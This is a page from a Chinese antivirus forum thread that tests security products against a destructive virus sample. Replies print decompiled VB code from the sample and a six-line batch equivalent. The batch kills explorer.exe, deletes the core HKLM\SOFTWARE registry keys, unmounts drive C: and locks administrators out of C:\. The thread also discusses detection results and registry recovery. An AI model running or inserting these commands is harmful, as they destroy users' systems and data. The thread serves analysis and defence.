楼主: 杀软综合狂
收起左侧

[病毒样本] 一个破坏型病毒,测测你们的杀软能否防住

  [复制链接]
Linzlee
发表于 2020-8-6 09:10:01 | 显示全部楼层
马云波波波 发表于 2020-8-5 10:41
你的 macfee vse 是否设置并启用了访问保护规则?麦咖啡版区里墨池、叶版规则应该能够防住这一病毒的。

我当时啥规则都没用,直接最大防护规则
共和时代
头像被屏蔽
发表于 2020-8-6 09:37:39 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
欧阳宣
头像被屏蔽
发表于 2020-8-6 14:52:59 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
共和时代
头像被屏蔽
发表于 2020-8-6 15:06:42 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
智量官方
发表于 2020-8-6 16:01:26 | 显示全部楼层
杀软病综合医院 发表于 2020-8-5 20:20
现在说下简单改MD5之后的双击情况360卫士和卡巴均可拦截,卡巴的学习能力还是很优秀
微点可拦截,根据规则 ...

感谢测试,我们已经调整了主防用于应对此类"病毒", 不过一般恶意程序都是逐利的,像这类"病毒"不会是我们防范重点.
ZNKZZ.
发表于 2020-8-6 19:48:34 | 显示全部楼层
本帖最后由 ZNKZZ. 于 2020-8-6 19:50 编辑

其实完全可以整个bat
  1. Private Sub Form_Load() '402660
  2.   loc_004026E3: var_24 = "cmd /c taskkill /f /im explorer.exe"
  3.   loc_0040270C: var_7C = "reg delete "
  4.   loc_00402721: var_8C = "HKEY_LOCAL_MACHINE\SOFTWARE\Classes"
  5.   loc_0040274A: var_9C = " /f"
  6.   loc_00402781: var_74 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Classes" & Chr(34) & " /f"
  7.   loc_004027B2: var_7C = "reg delete "
  8.   loc_004027CA: var_8C = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide"
  9.   loc_004027ED: var_9C = " /f"
  10.   loc_00402824: var_74 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide" & Chr(34) & " /f"
  11.   loc_00402855: var_7C = "reg delete "
  12.   loc_00402867: var_8C = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft"
  13.   loc_00402890: var_9C = " /f"
  14.   loc_004028C7: var_74 = "reg delete " & Chr(34) & "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft" & Chr(34) & " /f"
  15.   loc_004028FA: var_eax = Sleep(10000)
  16.   loc_00402921: var_24 = "cmd /c mountvol C: /d"
  17.   loc_00402952: var_24 = "@echo y|cacls c:\ /d administrator /c"
  18.   loc_00402974: GoTo loc_0040299A
  19.   loc_00402999: Exit Sub
  20.   loc_0040299A: 'Referenced from: 00402974
  21. End Sub
复制代码


杀软综合狂
 楼主| 发表于 2020-8-6 20:01:19 | 显示全部楼层
ZNKZZ. 发表于 2020-8-6 19:48
其实完全可以整个bat

看起来破坏力挺大,为什么杀软都不识别

评分

参与人数 1人气 +1 收起 理由
mr_bean_forever + 1 版区有你更精彩: )

查看全部评分

落华无痕
发表于 2020-8-6 20:33:42 | 显示全部楼层
好无语,一个低质量的批处理exe,水了这么多层。转换成下面这批处理代码,可以看出很多是多余的。
  1. cmd /c taskkill /f /im explorer.exe
  2. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes" /f
  3. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide " /f
  4. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft" /f
  5. cmd /c mountvol C: /d
  6. @echo y|cacls c:\ /d administrator /c
复制代码
2、3行多余。4已经包含了3,另外4行执行后重启都蓝屏进不了系统,2也多余了。
最后一行也多余,5执行后,C盘已经不存在了,所以最后一行根本无法执行。

不知道干嘛杀软不拦截对C盘卸载操作:“mountvol C: /d”。不过删除注册表不拦截这点感觉应该算系统的锅,重要注册表项应该只允许TrustedInstaller用户完全控制。

否则被删除重要注册表后,只能在PE备份C:\Windows\System32\config\SOFTWARE文件,用regback目录日期相近的SOFTWARE替换。

regback里的文件需要计划任务定时备份(\Microsoft\Windows\Registry\RegIdleBackup)。

评分

参与人数 2人气 +3 收起 理由
godotkf + 2 版区有你更精彩: )
anthonyqian + 1 u

查看全部评分

渔舟唱晚
发表于 2020-8-6 20:37:37 | 显示全部楼层
太厉害了,微点免费杀毒根本没反应,害我重新装系统
chunyet
发表于 2020-8-6 22:48:32 来自手机 | 显示全部楼层
Lawchake78 发表于 2020-8-5 11:53
又是这一套论调,问题是某些主流防毒产品推出至今已经有近30年的开发历史,也拥有大量从业时间非常长开发 ...

关键是你如果不去主动下载,你是很难遇到这种病毒的,自己主动去下载病毒,没我任何杀软能百分百拦截
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-20 04:58 , Processed in 0.141526 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表